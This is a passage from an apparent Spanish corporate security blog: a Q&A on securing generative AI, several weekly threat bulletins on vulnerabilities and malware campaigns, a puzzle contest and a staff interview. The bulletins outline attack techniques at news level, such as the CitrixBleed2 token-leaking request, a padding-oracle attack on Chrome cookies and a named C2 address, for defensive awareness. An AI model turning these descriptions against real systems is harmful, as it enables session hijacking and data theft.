compartida. En este contexto, la dimensión regulatoria adquiere una relevancia crítica. Un claro ejemplo de ello es el Reglamento de Inteligencia Artificial de la Unión Europea (AI Act), que representa la primera legislación integral a nivel mundial sobre IA. En cualquier caso, modelos mal protegidos pueden compartir información sensible, ser manipulados para generar contenido indebido o sufrir ataques que afecten a su integridad, sin perder de vista que hablamos de aplicaciones que se están convirtiendo en algunos casos en críticas para el negocio. ¿Qué medidas de seguridad específicas se deben implementar para proteger los datos sensibles utilizados en el entrenamiento de modelos de IA generativa? La protección de datos sensibles en el contexto de la IA generativa requiere un enfoque diferenciado según el uso que se haga de la información: si esta se utiliza para entrenar modelos propios o si se expone a través de modelos preentrenados que acceden a fuentes internas (por ejemplo, mediante RAG). En ambos casos es fundamental restringir el acceso a los datos sensibles mediante las protecciones disponibles para la identidad como autenticación multifactor (MFA), control de acceso basado en roles, políticas de acceso condicional y soluciones avanzadas de ID Protection y Governance. Estas medidas garantizan que solo se acceda a los datos permitidos, minimizando el riesgo de accesos indebidos. La seguridad en entornos colaborativos y la clasificación y protección de la información son especialmente críticas en modelos conectados a fuentes internas (RAG) donde se acceder a documentos compartidos en tiempo real y, por tanto, es clave clasificar y etiquetar la información para aplicar tecnologías de DLP. En todos los casos se debe garantizar la trazabilidad y auditoría para poder reaccionar ante incidentes. Ya sea que tu organización esté explorando modelos de IA generativa conectados a sus datos o entrenando modelos propios desde cero, la ciberseguridad y la protección de datos no son opcionales. Son parte del diseño responsable de cualquier solución basada en IA. Invertir en una arquitectura segura y trazable no solo protege tus datos: también protege la confianza en tus resultados. “La Ciberseguridad y la protección de datos no son opcionales. Son parte del diseño responsable de cualquier solución basada en IA.” ¿Cómo afecta la arquitectura de alto nivel de una aplicación de IA generativa a las medidas de protección? La arquitectura de alto nivel de una aplicación de IA generativa se compone de tres bloques principales: el entrenamiento del modelo (base y fine-tuning), el runtime del LLM y la capa de aplicación. Cada nivel requiere controles específicos para garantizar una operación segura y conforme con los riesgos propios de los entornos corporativos. Control de los datos de entrenamiento. La protección de los datos sensibles utilizados para entrenar modelos requiere una sólida gobernanza del dato, control de accesos y herramientas como DLP, clasificación y auditoría para evitar su exposición o uso indebido. Seguridad del LLM. La seguridad del runtime del LLM, responsable de procesar los prompts y generar respuestas, requiere una protección robusta basada en tres pilares: controles de infraestructura, como la microsegmentación y soluciones CNAPP (CSPM, CWPP, CIEM) para proteger entornos cloud o hibridos; gestión continua de la postura de seguridad de IA (AI-SPM), que permite monitorizar, detectar desviaciones y aplicar medidas correctivas proactivas; y evaluaciones ofensivas específicas para IA generativa, mediante pruebas de prompt injection, extracción de datos o manipulación de respuestas, que validan la resiliencia del modelo frente a ataques avanzados. Seguridad de la aplicación de IA generativa. En la capa de aplicación, donde se produce la interacción con el usuario, se aplican medidas de evaluación continua mediante las capacidades de seguridad para aplicaciones e infraestructura de IA generativa (Offensive security) y el despliegue de soluciones como WAD, que refuerzan la seguridad y resiliencia de las API, plugins y extensiones. ¿Cuáles son los principales riesgos asociados con la implementación de IA generativa y cómo se pueden mitigar? Como hemos visto, a pesar de sus múltiples beneficios, la aparición de nuevas amenazas asociadas a la IA generativa conlleva inevitablemente la aparición de nuevos riesgos que las organizaciones deben identificar y gestionar. Entre los más relevantes se encuentran la pérdida de datos provocada por el uso de herramientas no autorizadas o por la falta de concienciación en los usuarios; los accesos no autorizados a información sensible; la manipulación del comportamiento del modelo mediante técnicas como las inyecciones de prompts o los jailbreaks; el uso de infraestructuras, modelos o aplicaciones sin garantías de seguridad; y el envenenamiento del modelo, que compromete directamente su integridad, fiabilidad y capacidad de generar respuestas válidas. De igual manera y en el plan regulatorio, el Reglamento Europeo de Inteligencia Artificial (AI Act) establece un nuevo marco jurídico basado en un enfoque de gestión de riesgos, que clasifica los sistemas de IA en cuatro niveles: riesgos inaceptables —prohibidos expresamente, como la puntuación social o la manipulación cognitiva—, riesgos altos —como aquellos que pueden comprometer derechos fundamentales—, riesgos limitados y riesgos mínimos. Por tanto, resulta fundamental mapear los riesgos que afectan a la organización y establecer una estrategia de seguridad integral que garantice su gestión eficaz. Esta estrategia debe combinar capacidades de identificación, protección y respuesta, permitiendo abordar de forma proactiva las amenazas asociadas al uso de IA. generativa. ¿Cómo se puede asegurar la IA generativa en un entorno corporativo mediante la identificación, protección y respuesta 360º? Asegurar la IA generativa en un entorno corporativo requiere desplegar un marco de seguridad completo basado en tres fases: Identificación, Protección y Respuesta 360º, aplicando controles especializados en cuatro ámbitos críticos: infraestructura, modelo IA, datos/identidad y aplicaciones. En la fase de Identificación, se llevan a cabo evaluaciones de infraestructura —incluyendo análisis de microsegmentación, gestión de riesgos de proveedores (VRM) y postura de seguridad en entornos de IA (AI-SPM)—, así como evaluaciones de aplicaciones, con el objetivo de detectar vulnerabilidades tanto en los entornos técnicos como en las soluciones de inteligencia artificial. Estas acciones se complementan con auditorías de identidad y datos, que permiten identificar accesos indebidos, configuraciones incorrectas y el uso no autorizado de herramientas de IA externas (Shadow AI). La fase de Protección aplica controles por capas: microsegmentación y CNAPP para la infraestructura; etiquetado de datos, DLP e IAM avanzado para proteger identidades e información sensible; AI Gateway y políticas de seguridad para los modelos LLM; y WAD y control de compartición para asegurar las aplicaciones de usuario. Por último, la fase de Respuesta 360º se apoya en visibilidad E2E, observabilidad y un SOC de IA integrado, que permite detectar y responder de forma ágil ante amenazas o incidentes. Esta estrategia asegura un ciclo completo de protección en todo el entorno de IA generativa. “Esta estrategia asegura un ciclo completo de protección en todo el entorno de IA generativa.” ¿Qué papel juegan las auditorías y la gestión de riesgos en la seguridad de la IA generativa? Las auditorías y la gestión de riesgos desempeñan un papel fundamental en la seguridad de la IA generativa, no solo desde una perspectiva técnica o regulatoria, sino también como elementos clave para proteger el valor y la continuidad del negocio. La gestión de riesgos permite identificar, evaluar y priorizar las amenazas específicas que introduce la IA generativa y su posible impacto sobre procesos críticos, reputación corporativa, cumplimiento normativo o propiedad intelectual. Esta visión orientada al impacto en el negocio es esencial para adoptar medidas de mitigación proporcionales y efectivas. Por otro lado, las auditorías de seguridad son clave para garantizar el cumplimiento de los controles de seguridad sobre los sistemas de IA. En Telefónica Tech hemos diseñado una metodología propia compuesta por seis fases: Reconocimiento y enumeración de superficies de ataque y servicios expuestos. Análisis de seguridad de las API, evaluando autenticación, autorización y protección ante abusos. Evaluación del modelo de IA, detectando vulnerabilidades como prompt injection o manipulación de respuestas. Análisis de la infraestructura Cloud, identificando errores de configuración o debilidades del pipeline de IA. Simulación de exfiltración de datos, verificando posibles filtraciones por mal diseño o uso indebido. Evaluación de la resiliencia, midiendo la capacidad de detectar, resistir y recuperarse ante ataques. Esta metodología ofrece una visión completa del estado de seguridad, ayudando a las organizaciones a anticiparse a riesgos y reforzar sus defensas de forma proactiva. ¿Qué beneficios en términos de seguridad han observado las empresas que han adoptado soluciones de IA generativa securizada con Telefónica Tech? Las organizaciones han logrado una visibilidad integral tanto sobre sus entornos de inteligencia artificial como sobre sus datos, lo que ha sido clave para reducir la superficie de ataque, reforzar la gobernanza y mejorar el cumplimiento normativo. La implantación de soluciones como AI-SPM, AI Gateway, WAD y VRM ha permitido proteger aplicaciones críticas, identificar vulnerabilidades en fases tempranas y coordinar respuestas ante incidentes de forma ágil y eficaz. Estas capacidades han sido determinantes para desplegar entornos de IA generativa de forma más segura, resiliente y alineada con los marcos regulatorios y de protección de la información. Y en el entorno de productividad de usuarios, la mejora es muy significativa evitando sobrecompartición de datos, o problemas de acceso a datos sensibles. AI & Data Agentes de IA y su impacto en la automatización empresarial 27 de febrero de 2025
17 de julio de 2025
Boletín Semanal de Ciberseguridad, 5-11 julio
Microsoft corrige 132 vulnerabilidades en su actualización de julio Microsoft ha publicado Patch Tuesday de julio de 2025, corrigiendo un total de 132 fallas, 14 de ellas catalogadas como críticas. Entre las más destacadas se encuentran varias vulnerabilidades de ejecución remota de código (RCE) en servicios ampliamente utilizados como Windows KDC Proxy (CVE-2025-49735, CVSSv3 8.1 según proveedor) y SharePoint Server (CVE-2025-49704, CVSSv3 8.8 según proveedor). También se han identificado fallos en Hyper-V (CVE-2025-48822, CVSSv3 8.6 según proveedor) y el mecanismo de seguridad NEGOEX (CVE-2025-47981), este último con un CVSSv3 de 9.8 según Microsoft. Pese a que ninguno de estos fallos ha sido explotado activamente, Microsoft ha clasificado varias como de explotación “más probable”. Cisco Talos ha publicado un nuevo conjunto de reglas Snort para detectar intentos de explotación de estas vulnerabilidades, e insta a los usuarios de firewalls a actualizar sus sistemas de defensa cuanto antes. Más info Bert: nuevo ransomware multiplataforma detectado en ataques globales Trend Micro ha identificado al nuevo grupo de ransomware Bert, activo desde abril y responsable de ataques contra organizaciones en Asia, Europa y EE. UU., incluyendo sectores como sanidad, tecnología y servicios de eventos. El ransomware afecta a sistemas Windows y Linux, y su vector de acceso inicial aún es desconocido, si bien estaría en desarrollo activo. Dentro del sistema, un script en PowerShell desactiva herramientas de seguridad antes de ejecutar el malware. Aunque no se ha atribuido a un grupo específico, se ha detectado infraestructura rusa en su operación, lo que podría sugerir vínculos con actores de esa región. Además, los investigadores señalan que Bert podría derivar de la variante Linux de REvil, grupo desmantelado en 2021, al encontrarse similitudes en su código. Más info Accesos ilegítimos a través de claves ASP.NET filtradas El Initial Access Broker Gold Melody, también conocido como Prophet Spider o UNC961, ha sido vinculado a una campaña de ataques que aprovecha claves ASP.NET filtradas para comprometer servidores y vender el acceso a otros actores maliciosos. Según Unit 42 de Palo Alto Networks, los atacantes emplean técnicas de deserialización ViewState para ejecutar código malicioso en memoria, evadiendo muchas soluciones EDR tradicionales. Microsoft ya había alertado en febrero de 2025 sobre más de 3.000 claves públicas susceptibles de ser explotadas para este fin. Las víctimas se concentran en sectores como finanzas, logística o tecnología, principalmente en EE. UU. y Europa. Entre enero y marzo de 2025 se detectó un pico de actividad, con uso de herramientas post-explotación como escáneres de puertos y programas en C# para escalada de privilegios. El ataque destaca por su persistencia en memoria y bajo rastro forense, lo que dificulta su detección sin análisis de comportamiento en servidores IIS. Más info Publicada una PoC para la vulnerabilidad CitrixBleed2 Investigadores de watchTowr han publicado recientemente una PoC para CitrixBleed 2 (CVE-2025-5777, CVSSv3 de 9.3), incrementando el riesgo de explotación masiva ante el bajo índice de parcheo observado. El fallo consiste en una lectura fuera de límites de memoria en dispositivos Citrix NetScaler ADC y Gateway, permitiendo a atacantes no autenticados extraer datos sensibles como tokens de autenticación desde la memoria del sistema. Esto facilita el secuestro de sesiones, eludir MFA y acceder sin autorización a sistemas críticos. El fallo afecta a dispositivos configurados como Gateway o servidores virtuales AAA. El ataque consiste en enviar una solicitud HTTP POST manipulada al endpoint de login, provocando la filtración de memoria en la respuesta XML bajo la etiqueta <InitialValue>. Esta técnica permite obtener tokens válidos tras múltiples intentos. Más info Nueva campaña de Anatsa en América del Norte ThreatFabric ha detectado una nueva campaña del troyano bancario Anatsa dirigida a EE. UU. y Canadá. Distribuido desde Google Play, Anatsa se oculta en apps legítimas como lectores de PDF que, tras alcanzar miles de descargas, reciben una actualización con código malicioso. El troyano permite robo de credenciales, keylogging y ejecución de transacciones desde el dispositivo infectado. En esta campaña, la app maliciosa figuró entre las tres más descargadas en su categoría y superó las 50.000 instalaciones. Su distribución, entre el 24 y 30 de junio, introdujo una falsa actualización que desplegó Anatsa y usó una superposición de pantalla que mostraba un mensaje de "mantenimiento programado" al abrir apps bancarias, ocultando actividades maliciosas y evitando el contacto con soporte. Las instrucciones se envían desde su servidor C2, permitiendo adaptarse a objetivos bancarios. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
11 de julio de 2025
Cyber Tech Games II: Si lo puedes oír, ya estás dentro
¿Tienes oído para los desafíos y mente afinada para los enigmas? Vuelve Cyber Tech Games con una segunda edición donde la música, el sonido, y tus habilidades, son los protagonistas. Esta vez el reto arranca con una imagen muy especial: a simple vista, parece una fotografía más. Pero si profundizas en ella descubrirás que está cargada de pistas y claves. Solo quienes sepan leer entre líneas, y entre notas, podrán resolver el reto. Haz clic en la aquí para abrir la imagen de la competición. Tu misión es analizarla con lupa, conectar los elementos y seguir un hilo lógico que te lleve a desentrañar el mensaje oculto. Pero cuidado: el tiempo apremia. ■ Tienes solo 48 horas para resolverlo. Premio para quien marque el compás más rápido Aquí no solo gana quien corre, sino quien interpreta mejor la partitura del reto. El primer participante en descifrar correctamente el código recibirá una tarjeta de Amazon valorada en 100 €. ■ Importante: La respuesta deberá enviarse acompañada de una explicación detallada con capturas de los pasos seguidos para descifrar el código. Adjunta la explicación en Word o PDF. ¿Cómo participar? No necesitas inscribirte ni registrarte. Simplemente resuelve el reto, consulta las bases legales y envía tu solución antes del viernes 11 a las 10:00 a. m. CET por correo electrónico. ✅ Actualizado viernes 11, 10 am CET: Gracias a todos los que habéis participado y enhorabuena al ganador. ¡Nos vemos en el próximo Cyber Tech Games!
9 de julio de 2025
Boletín Semanal de Ciberseguridad, 4 julio
Cisco parchea una vulnerabilidad crítica en Unified CM Cisco ha solucionado una vulnerabilidad crítica denominada CVE-2025-20309 (CVSSv3 10.0 según el proveedor) en sus sistemas Unified Communications Manager (Unified CM y Unified CM SME), que permitía a un atacante remoto y no autenticado acceder con privilegios de root mediante credenciales estáticas no modificables, utilizadas durante el desarrollo. La explotación permitiría la ejecución de comandos arbitrarios con permisos de administrador total. El fallo afecta a versiones Engineering Special 15.0.1.13010-1 hasta 15.0.1.13017-1. Cisco no ha identificado exploits activos ni código de prueba de concepto, pero ha publicado métodos para identificar posibles indicadores de compromiso asociados a la explotación del fallo. La única forma de mitigar el fallo es actualizar a la versión 15SU3 (julio de 2025) o aplicar el parche CSCwp27755. Más info Descubierta vulnerabilidad en el nuevo cifrado de cookies de Chrome Investigadores de CyberArk han revelado un fallo crítico en la protección AppBound Cookie Encryption de Google Chrome, introducida en la versión 127 para mitigar el robo de cookies por malware. El ataque, bautizado como “C4 Bomb” (Chrome Cookie Cipher Cracker), permite a atacantes con bajos privilegios acceder a cookies cifradas sin necesidad de permisos de administrador. El método se basa en un ataque de padding oracle que abusa del manejo de errores del sistema de cifrado DPAPI de Windows y los registros de eventos para recuperar claves cifradas. A través de miles de solicitudes al servicio de elevación de Chrome, es posible descifrar las cookies protegidas. Esta técnica elude las defensas duales que combinaban cifrado por usuario y por el sistema, y ha sido integrada en herramientas de código abierto, facilitando su uso por actores menos sofisticados. Google ha reconocido el fallo y trabaja con la comunidad para reforzar las defensas ante estas nuevas amenazas. Más info Ataque con RansomHub compromete red mediante RDP y herramientas legítimas DFIR Labs ha revelado una cadena de ataque sofisticada ejecutada por un actor que utilizó el ransomware RansomHub. El acceso inicial fue obtenido mediante password spraying sobre un servidor RDP expuesto en noviembre de 2024. El atacante accedió a varias cuentas, logrando privilegios elevados y dando paso a una operación de seis días que incluyó robo de credenciales, movimientos laterales y cifrado masivo de archivos. De acuerdo con los investigadores, se emplearon herramientas como Mimikatz, Nirsoft y escáneres de red, además de binarios legítimos como net y nltest. El uso de software remoto como Atera y Splashtop permitió mantener persistencia sin levantar sospechas. A través de Rclone, se exfiltraron 2 GB de datos a un servidor externo antes del despliegue del ransomware mediante el archivo amd64.exe. En el ataque también se llevó a cabo el borrado de shadow copies y registros, logrando una “Time to Ransomware” de 118 horas. Más info Indicios de explotación activa de Citrix Bleed 2 ReliaQuest ha observado indicios de explotación activa de la vulnerabilidad CVE‑2025‑5777 (CVSSv4 9.3), conocida como Citrix Bleed 2, para obtener acceso inicial, incluyendo sesiones web secuestradas, reutilización de sesiones desde múltiples IPs, consultas LDAP para reconocimiento en Active Directory, y uso de herramientas como ADExplorer64.exe en entornos comprometidos. Esta vulnerabilidad, que afecta a dispositivos Citrix NetScaler ADC y Gateway, permite leer memoria fuera de límites y extraer tokens de sesión, facilitando eludir la autenticación, incluso con MFA activo. Citrix recomienda aplicar los parches disponibles —versiones ADC/Gateway 14.1‑43.56, 13.1‑58.32, 12.1‑55.328 y posteriores— y cerrar todas las sesiones activas tras la actualización para prevenir accesos persistentes. Más info Alemania solicita a Google y Apple retirar DeepSeek de sus tiendas La Comisionada de Protección de Datos de Berlín solicitó formalmente a Google y Apple retirar la aplicación DeepSeek AI de sus tiendas por violaciones al Reglamento General de Protección de Datos (GDPR). Se acusa a la empresa china propietaria, Hangzhou DeepSeek AI, de recolectar ilegalmente datos de usuarios alemanes y transferirlos a servidores en China, donde no se garantizan estándares adecuados de protección. A pesar de una solicitud previa para retirar voluntariamente la app, la empresa se negó, lo que llevó a las autoridades a invocar el Artículo 16 de la Ley de Servicios Digitales (DSA) para denunciar contenido ilegal. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
4 de julio de 2025
#WomenWithTech: María García Aznar transforma ideas innovadoras en herramientas prácticas
María García Aznar, Product Manager en el área de Intelligent Workplace, lidera el desarrollo de soluciones avanzadas de IA aplicadas al entorno laboral. Con una sólida experiencia en Ingeniería de Telecomunicaciones y Marketing de Producto, María fusiona tecnología y estrategia para transformar ideas innovadoras en herramientas prácticas. Su enfoque combina curiosidad tecnológica, visión estratégica y colaboración empática, destacando como una referente en la integración de IA en el puesto de trabajo. ______ ¿Quién eres y a qué te dedicas? Soy Maria Garcia Aznar, Product Manager de Intelligent Workplace en Telefónica Tech. Mi trabajo consiste en liderar la creación y evolución de soluciones de inteligencia artificial enfocadas en el puesto de trabajo. ¿Cuál es tu especialización? ¿Cómo llegaste a dedicarte a lo que haces ahora? Estudié Ingeniería de Telecomunicaciones y, durante unas prácticas, descubrí el Marketing de Producto. No conocía ese rol y me fascinó poder unir innovación tecnológica y estrategia de negocio, así que orienté mi carrera en esa dirección. Desde entonces, he seguido desarrollándome en este campo, donde me siento muy a gusto. ¿Tenías claro desde pequeña que querías dedicarte al mundo de la tecnología? Siempre he sido muy curiosa con la tecnología. Aún recuerdo la emoción de trastear con nuestro primer ordenador familiar y de explorar Internet por primera vez. Esa curiosidad sigue guiándome, aunque si te soy sincera, nunca tuve claro que eso pudiese aplicarse a una profesión en el futuro. Siempre he sido muy curiosa con la tecnología. Esa curiosidad sigue guiándome. ¿Quién te motivó a escoger una profesión relacionada con la tecnología? Aunque mi madre siempre ha sido la que me introdujo en el mundo de la tecnología desde bien pequeña e intentó que siempre estuviéramos actualizados, fue mi padre el que me persuadió para aprovechar esta fascinación por la tecnología y convertirla en una carrera profesional. Al principio no veía clara la conexión con las titulaciones que existían entonces, pero con el tiempo me di cuenta de que había elegido el camino correcto, ya que me ha conducido hasta donde estoy ahora. Mi trabajo consiste en liderar la creación y evolución de soluciones de inteligencia artificial enfocadas en el puesto de trabajo. ¿Cómo describirías tu trayectoria profesional hasta ahora y cuáles son las habilidades que utilizas en Telefónica Tech? Mi trayectoria ha estado muy ligada a Telefónica y siempre en el área de Producto. Comencé en Telefónica Global Solutions llevando servicios de videoconferencia, y poco a poco fui especializándome en soluciones de colaboración. Con la creación de Telefónica Tech, me uní al equipo para seguir impulsando este tipo de servicios, y en el último año me he enfocado en soluciones de inteligencia artificial. Las habilidades que más utilizo son la visión estratégica, la curiosidad tecnológica y una forma de trabajar empática y colaborativa. Me gusta estar al día y ver cómo convertir cada innovación en algo útil y con impacto real. ¿Cómo concilias tu puesto con tu vida personal? Para mí la flexibilidad que tenemos es fundamental. Esa flexibilidad es la que me permite organizarme, ya que tengo dos niños pequeños y me esfuerzo por planificarme para estar presente en casa y en el trabajo. Creo que la clave está en encontrar ese equilibrio que te permite rendir sin renunciar a tu vida personal. ¿Cómo promovemos en Telefónica Tech la diversidad de género y la inclusión? Telefónica Tech apuesta firmemente por visibilizar el talento femenino y fomentar entornos de igualdad real. Programas como #WomenWithTech y las redes internas nos dan voz y nos empoderan. Mi experiencia ha sido muy positiva, y tengo la suerte de haber trabajado en el día a día con otras mujeres que han sido referentes para mí, algo que aún no es tan habitual en el sector tecnológico. La visión estratégica, la curiosidad tecnológica y una forma de trabajar empática son claves en mi día a día. ¿Podrías explicarnos qué significa para ti la iniciativa #WomenWithTech? Es una forma de crear comunidad, darnos visibilidad e inspirar a otras mujeres. Me encanta que se generen espacios donde podamos compartir experiencias, puntos de vista, apoyarnos y servir de referentes para otras mujeres. Sentir esa red cercana motiva y refuerza nuestro papel en la transformación digital. ¿Qué aportamos las mujeres a las profesiones STEAM? Yo diría que las mujeres aportamos una forma de liderazgo y gestión que destaca por su empatía, colaboración y capacidad de escucha. Tenemos una sensibilidad especial para comprender las necesidades del equipo y de los proyectos y aportar un punto de vista diferente. Además, nuestra habilidad para abordar múltiples tareas de forma eficaz y mantener una visión integral es especialmente valiosa en entornos como los de las disciplinas STEAM. ¿Qué consejo darías a otras mujeres que desean seguir una carrera STEAM y qué habilidades crees que son importantes para tener éxito en el sector de la tecnología? Que se atrevan, que rompan estereotipos y se rodeen de personas que les impulsen, ya que cada día somos más las mujeres que formamos parte de este sector. Las carreras STEAM abren muchísimas puertas y necesitamos más mujeres que aporten su talento y su visión al sector tecnológico. Telefónica Tech Un viaje que continúa: II edición de #WomenWithTech 28 de marzo de 2025
1 de julio de 2025
Boletín Semanal de Ciberseguridad, 21-27 junio
Citrix corrige vulnerabilidad crítica similar a CitrixBleed Citrix ha solucionado una vulnerabilidad crítica, identificada como CVE-2025-5777, que afecta a NetScaler ADC y NetScaler Gateway. Con un CVSSv4 de 9.3 según Citrix, el fallo es un out-of-bounds read provocado por validación insuficiente de entradas. Al igual que la conocida CitrixBleed (CVE-2023-4966, CVSSv3 9.4 según proveedor), podría permitir a atacantes robar tokens de sesión válidos de dispositivos NetScaler expuestos a Internet mediante peticiones mal formadas. También se ha corregido CVE-2025-5349, una vulnerabilidad de control de acceso con CVSSv4 8.7 según proveedor. Las versiones afectadas incluyen ramas 14.1, 13.1, 13.1-FIPS, 13.1-NDcPP y 12.1-FIPS anteriores a las últimas actualizaciones. Las versiones 12.1 y 13.0 ya están fuera de soporte y siguen siendo vulnerables. Citrix recomienda actualizar a versiones corregidas y ejecutar los comandos kill icaconnection -all y kill pcoipConnection -all tras la actualización para cerrar sesiones activas y evitar posibles compromisos. Más info Prometei vuelve a operar con nuevas versiones centradas en sistemas Linux Desde marzo de 2025, Unit 42 detectó nueva actividad del botnet Prometei, enfocado en sistemas Linux. Su distribución se realiza mediante solicitudes HTTP desde servidores en Indonesia. Utiliza el empaquetador UPX y una cola JSON embebida, lo que complica el análisis estático. El botnet mantiene un diseño modular que permite minería de Monero, explotación de vulnerabilidades, fuerza bruta de credenciales y robo de datos. Las versiones 3 y 4 incluyen un backdoor para asegurar persistencia y capacidad de actualización. Se basa en DGA para su infraestructura C2 y puede incorporar nuevos módulos sin intervención manual. Las estadísticas muestran un incremento de muestras entre marzo y abril de 2025. Además de minar, despliega herramientas para monetización mediante robo de datos y propagación. Unit 42 recomienda usar reglas YARA que identifiquen la combinación de UPX y JSON, y monitorear tráfico DNS anómalo para detectar actividad DGA. Más info Fallo crítico en Performave Convoy podría permitir ataques RCE Desde GitHub se ha detectado una vulnerabilidad en el panel de gestión de servidores KVM Performave Convoy, ampliamente utilizado por los proveedores de hosting. El fallo, identificado como CVE-2025-52562 (CVSSv3 de 10.0), reside en el componente LocaleController de Convoy, donde una validación de entrada incorrecta permite realizar ataques a través de directorios. Los atacantes pueden elaborar peticiones HTTP maliciosas con parámetros de configuración regional y espacio de nombres manipulados para atravesar directorios e incluir archivos PHP arbitrarios. Esto puede conducir a la ejecución remota de código (RCE), robar de datos sensibles y realizar una explotación no autenticada de las instancias vulnerables. En concreto, los atacantes se aprovechan de la insuficiente desinfección de las entradas proporcionadas por el usuario en los parámetros HTTP locale y namespace. Como medidas de mitigación, se recomienda actualizar a la versión 4.4.1 o superiores de Convoy, aplicar una validación de entrada estricta, restringir la configuración regional o limitar el espacio de nombres a determinados caracteres. Más info Falsificación de NetExtender roba credenciales VPN a usuarios Desde junio de 2025, SonicWall y Microsoft Threat Intelligence identificaron una campaña que distribuye una versión modificada del cliente SonicWall SSL VPN NetExtender, imitando la oficial y firmada digitalmente por "CITYLIGHT MEDIA PRIVATE LIMITED" en lugar de la firma legítima. El instalador malicioso parchea NeService.exe para evitar la verificación de firmas y modifica NetExtender.exe para capturar configuraciones VPN –usuario, contraseña, dominio– y transmitirlas al servidor de control (132.196.198.163:8080). SonicWall y Microsoft bloquearon los dominios maliciosos, revocaron el certificado y lo detectan como "Fake‑NetExtender" (SonicWall) y "TrojanSpy:Win32/SilentRoute.A" (Microsoft). Se recomienda descargar siempre clientes VPN desde fuentes oficiales y contar con soluciones como SonicWall Capture ATP o Microsoft Defender para detectar versiones manipuladas. Más info SparkKitty roba claves de recuperación de criptomonedas desde la galería del móvil Investigadores de Kaspersky han identificado un nuevo malware denominado SparkKitty, presente tanto en Google Play como en la App Store. Se trata de una evolución de SparkCat, un malware detectado en enero que utilizaba OCR para robar frases de recuperación de billeteras de criptomonedas (conocidas como seed phrases) desde imágenes. SparkKitty roba todas las fotos del dispositivo infectado, buscando principalmente seed phrases, pero también puede usarlas para chantaje si contienen información sensible. Las apps maliciosas, como 币coin (iOS) y SOEX (Android), ya han sido retiradas. Además, se han detectado clones de TikTok y apps de apuestas distribuidas fuera de los canales oficiales. En Android, SparkKitty se oculta en apps Java/Kotlin y usa módulos Xposed; en iOS, se camufla como frameworks falsos. Una vez instalado, solicita permisos para acceder a la galería y sube las imágenes al servidor de los atacantes. En Android, algunas versiones filtran imágenes que contienen texto mediante Google ML Kit. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
27 de junio de 2025
Boletín Semanal de Ciberseguridad, 14-20 junio
Detectados cinco nuevos fallos en la biblioteca libxml2 Investigadores de ciberseguridad han detectado cinco nuevos fallos en libxml2. Tres de ellos (CVE-2025-49794 y CVE-2025-49796, ambos CVSSv3 9.1; y CVE-2025-49795, CVSSv3 7.5) afectan específicamente al componente de validación Schematron, correspondiéndose con fallos use-after-free, de confusión de tipos y de desviación de puntero nulo, respectivamente. Estas fallas podrían bloquear las aplicaciones que procesan documentos XML mal formados. Las dos vulnerabilidades restantes fueron registradas como CVE-2025-6021 (CVSSv3 7.5), un desbordamiento de enteros en la función xmlBuildQName que podría dar lugar a desbordamientos de búfer, y CVE-2025-6170 (CVSSv3 2.5), un desbordamiento de búfer basado en pila en el shell interactivo de xmllint que de código arbitrario. Los responsables de libxml2 están considerando eliminar por completo el soporte de Schematron debido a la concentración de vulnerabilidades en este componente, por lo que por el momento no se habrían anunciado parches de seguridad, publicándose una corrección para el fallo CVE-2025-6021. https://www.openwall.com/lists/oss-security/2025/06/16/6 Operación de phishing vincula al gobierno ruso con robo de contraseñas específicas de aplicaciones Desde 2024, Citizen Lab ha observado una operación de ingeniería social vinculada a actores rusos que apunta a críticos del Kremlin y disidentes, empleando correos altamente personalizados para extraer contraseñas específicas de aplicaciones. Los atacantes envían emails que parecen venir de contactos conocidos e incluyen archivos PDF supuestamente cifrados, dirigiendo a las víctimas a páginas falsas pre‑llenadas para que ingresen credenciales y los tokens MFA asociados. Se han identificado dos grupos principales: Coldriver, vinculado al FSB, y Coldwastrel, este último con técnicas similares. Entre las víctimas se hallan políticos exiliados, periodistas y ONG, especialmente con conexiones internacionales o redes activas en temas sensibles. La campaña es notable por su efectividad y bajo perfil tecnológico: sin malware avanzado ni exploits, solo confianza basada en ingeniería social sofisticada. Más info A la venta datos personales de toda la población de Paraguay Un actor de amenazas ha puesto a la venta 7,4 millones de registros personales de ciudadanos paraguayos en la dark web, correspondientes a bases de datos de organismos estatales. Los datos, que afectarían a la totalidad de la población del país, incluyen nombres, género, dirección, fecha de nacimiento y número de cédula de identidad, entre otros. Más info Veeam corrige RCE crítica en Backup & Replication y vulnerabilidades adicionales Veeam ha lanzado la versión 12.3.2 de Backup & Replication (y versión 6.3.2 del agente Windows), incluyendo parches para tres vulnerabilidades importantes. La más grave, CVE‑2025‑23121, permite ejecución remota de código en el servidor de backup por un usuario autenticado en el dominio (CVSSv3 9.9). También se corrige CVE‑2025‑24286 (CVSSv3 7.2), un fallo que permite a operadores de backup modificar trabajos y ejecutar código arbitrario, y CVE‑2025‑24287 (CVSSv3 6.1), que permite a usuarios locales privilegiados cambiar el contenido de carpetas para ejecutar código con derechos elevados. Las versiones afectadas incluyen Backup & Replication 12.3.1 y anteriores, así como Agent for Windows 6.3.1 o anteriores. Veeam recomienda actualizar urgentemente a 12.3.2 y 6.3.2 respectivamente para mitigar estos riesgos. Más info Análisis de Anubis, ransomware con wiper integrado El grupo detrás del ransomware-as-a-service (RaaS) Anubis ha incorporado un módulo de wiper a su malware, diseñado para eliminar permanentemente los contenidos de los archivos afectados, impidiendo su recuperación incluso si se paga el rescate. Según lo publicado por Trend Micro, esta función, activada mediante el parámetro ‘/WIPEMODE’, borra los datos dejando intactos los nombres y estructuras de archivos. Anubis fue detectado por primera vez en diciembre de 2024 y se hizo más activo en 2025, anunciando en febrero un programa de afiliados en el foro RAMP. Su modelo de reparto ofrece hasta un 80% de las ganancias a los afiliados, lo que podría aumentar su volumen de ataques. Anubis emplea ECIES para cifrar archivos, que luego reciben la extensión ‘.anubis’, y lanza notas de rescate en HTML. Además, intenta sin éxito modificar el fondo de pantalla. El malware también elimina copias de sombra y detiene servicios para maximizar el daño. La campaña suele comenzar mediante correos de phishing. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
20 de junio de 2025
